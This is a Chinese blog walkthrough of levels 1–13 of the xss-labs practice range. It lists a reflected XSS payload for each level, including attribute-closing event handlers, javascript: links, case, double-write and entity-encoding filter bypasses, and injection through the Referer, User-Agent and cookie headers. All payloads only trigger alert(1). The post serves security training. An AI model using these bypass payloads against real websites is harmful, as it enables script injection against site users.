xss-labs第1-13关详解

于 2024-08-02 09:21:58 发布
阅读量322 收藏 5
点赞数 1
分类专栏: 靶场 文章标签: xss 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62457642/article/details/140863519
版权

Less-1

image.png
直接将网址中的test改成

<script>alert(1)</script>

image.png

Less-2

image.png
输入后没反应,查看源码后发现是闭合问题
修改为

"><script>alert(1)</script>

image.png

Less-3

image.png
这里看到><被注释掉了
尝试用没有<>的事件试试onclick(onfocus)

'onclick='alert(1)

image.png

Less-4

image.png
和第三关类似,换个闭合方式即可

"onclick="alert(1)

image.png

Less-5

image.png
发现onclick关键字被破坏
image.png
尝试闭合发现情况一样
可以用a标签的href 属性来构造,注意闭合

"><a href=javascript:alert(1)>test</a>

image.png

Less-6

image.png
发现href关键字被破坏
尝试大小写绕过

"><a hRef=javascript:alert(1)>test</a>

image.png

Less-7

image.png
过滤了部分,试试双写绕过

"><a hrhrefef=javascrscriptipt:alert(1)>test</a>

image.png

Less-8

image.png
image.png
双写,大小写均绕过失败
image.png
友情链接里得关键字也被破坏,尝试unicode编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

image.png

Less-9

image.png
第9关和第8关类似,提示链接不合法
加入**http://**试试
image.png
合法,但不能跳转,把http://闭合掉
image.png

Less-10

image.png
没有对话框,直接在网址中尝试
image.png
查看源码,发现三个type
image.png
给他们三个分别传值试试
image.png
只有t_sort可以上传值,从这里入手,注意闭合

" type='text' onclick='alert(1)'

image.png

Less-11

用第10关的方式发现无法过去
image.png
查看源码发现有ref标签,怀疑是referer
用Burpsuite抓包试试
image.png
对referer进行修改
image.png

" type='text' onclick='alert(1)'

image.png

Less-12

查看源码发现是UA修改
image.png
用Burpsuite进行抓包修改UA
image.png

" type='text' onclick='alert(1)'

image.png

Less-13

查看源码发现是cookie修改
image.png
用Burpsuite进行抓包修改cookie
image.png

" type='text' onclick='alert(1)'

image.png

秋妤.
关注
专栏目录
xss-labs通攻略教程(level1~level 10)
2401_84091580的博客
04-13 937
你要问前端开发难不难,我就得说计算机领域里常说的一句话,这句话就是『难的不会,会的不难』,对于不熟悉某领域技术的人来说,因为不了解所以产生神秘感,神秘感就会让人感觉很难,也就是『难的不会』;当学会这项技术之后,知道什么什么技术能做到什么做不到,只是做起来花多少时间的问题而已,没啥难的,所以就是『会的不难』。我特地针对初学者整理一套前端学习资料分享给大家,戳这里即可领取厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**如果你觉得这些内容对你有帮助,可以扫码获取!!(备注:前端)
xss-labs通详解 Level 6-10
qq_41755084的博客
10-25 1042
这一整体上与第五类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
Xss-labs(1)第一到第十一
m0_46412408的博客
09-25 759
Xss-labs靶场训练第一:查看页面源代码回显playload长度:插入一段js代码,get传参,一个简单的插入顺利来到第二,二话不说先直接尝试插入,并没有成功:查看页面源代码:特殊字符被实体转义了我们需要闭合掉双引号即可,构造payload,这一是闭合绕过来到第三,随便输入一个闭合弹窗试试,符号也被实体化了:查看php源码。
xss-lab记录(一)
Boom!脑洞大爆炸的博客
03-01 1380
xss-lab打通(1-5)
XSS-Lab 1-10
qq_51558360的博客
03-21 324
不使用过滤器 name=<script>alert(1)</script> 闭合标签 输入第一题的答案,没有成功,查看源码,发现: 我们输入的数据,是在表单中的value属性内 法一: 所以需要先闭合input标签,然后在注入代码,闭合标签: "><script>alert(1)</script> 法二: 是闭合value属性,然后在input标签内加入事件属性: " οnclick="alert(11) 单引号闭合并添加事件 输入测试:
XSS-Lab 1-15
震山的博客
08-25 333
个人 XSS-Lab记录
xss-labs-master源码
07-06
XSS防御中,客户端验证可以作为第一道防线,但更重要的防御措施应该在服务器端实施,因为客户端验证可以被绕过。 接下来是一系列的PHP文件,如"level9.php"、"level13.php"等,这些都是靶场的各个级别。PHP是...
xss-labs通详解 Level 11-15
qq_41755084的博客
10-26 1275
这一比上一多了一个标签,其他没有变化,先试一下上一的注入语句。发现在t_sort的标签中的"被编码成了html实体字符,没办法正常闭合了。而t_ref的值看起来像是请求的referer头。那我们将上一的代码从referer头处传入。页面中出现了输入框,点击该输入框,弹窗成功。
XSS-labs通(超详细)
wulanlin的博客
12-30 7081
1.第一 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三 ​ 用第二的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看到使
XSS-labs通教程(1-5):
snowlyzz的博客
03-12 5567
比较新手向的XSS反射型靶场,比较基础。
XSS攻击-xss-lab(1-18)详细讲解
wrypot的博客
03-29 1934
发现单引号前面的内容被赋值给了value,也就是说单引号是value的闭合字符,构造语句开头一个单引号,后面加一个空格(input标签里面属性直接用空格隔开)所以我们接下来要做得事情是,首先&参数t_sort,然后用双引号闭合value值,接着将type类型从hidden隐藏改为text文本,再用onfocus事件触发js语句,最后别忘了,因为我们用双引号闭合了value,所以value本身有的一个双引号多出来了,我们在onfocus="javascript:alert(123)
XSS-labs1-20通过手册
rumil的博客
09-21 2178
ng-include指令一般用于包含外部HTML文件,ng-include属性的值可以是一个表达式,返回一个文件名,但是默认情况下,包含的文件需要包含在同一域名下,也就是要调用同一域名下的其他网页。通过代码发现,本卡有两个参数:arg01、arg02,当我们发送的时候,发现他们是会互相拼接起来的,那么我们就容易想到这里会不会就是突破口,发现这两个参数是在embed上,embed标签定义嵌入的内容,并且做了尖括号过滤,那么我们可以加入一个属性进去,生成恶意代码。被HTML实体编码了,成了实体字符。
xss-labs靶场1-5
zyh1588的博客
11-21 426
小白回顾xss靶场1-5
xss-labs通攻略教程(level1~level 10(1)
m0_60388261的博客
03-18 1054
为了帮助大家更好温习重点知识、更高效的准备面试,特别整理了《前端工程师面试手册》电子稿文件。内容包括html,css,JavaScript,ES6,计算机网络,浏览器,工程化,模块化,Node.js,框架,数据结构,性能优化,项目等等。包含了腾讯、字节跳动、小米、阿里、滴滴、美团、58、拼多多、360、新浪、搜狐等一线互联网公司面试被问到的题目,涵盖了初中级前端技术点。前端面试题汇总开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】JavaScript性能linux。
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9343
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
xss-labs1-13(记录一下)
最新发布
weixin_74182283的博客
04-22 745
a href='javascript:alert(1)'> 这个代码便是js中一个基本的伪协议写法,通过修改href的值(一般href后面都跟一个正常地址)将其修改成javascript:url(构造的东西) 在,执行的时候,会先运行href里的代码,而href里是个javascript,探测到javascript后,会先执行javascript后面的url,也就是构造的东西,如果这个构造的东西返回不为空,则会将构造的数据放到前台上。因此这里需要尝试使用其他语句来对其进行,可以尝试使用js中的伪协议。
xss-lab(1-5)卡笔记
Yoo_666的博客
07-12 568
文章目录(一)XSS(二)xss-lab(三)卡笔记第一第二第三第四第五 (一)XSS XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,xss漏洞大多数是寻找参数未过滤的输出函数。 (二)xss-lab 靶场下载地址 链接:https://pan.baidu.com
网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5670
网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS-Lab第十
07-27
XSS-Lab的第十是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一都有不同的XSS注入漏洞。在第十中,与上一不同的是会加入地址的检查。具体来说,该会检查输入的数据中是否包含"http://"字段。因此,为了通过这一,我们需要在输入的字段中加入该字段,例如输入"java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('http://')"。这样,当受害者访问该页面时,恶意代码会在其浏览器上执行,从而成功通过第十。 #### 引用[.reference_title] - *1* *2* *3* [XSS攻击-xss-lab(1-10)详细讲解](https://blog.csdn.net/qq_43395215/article/details/105955004)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值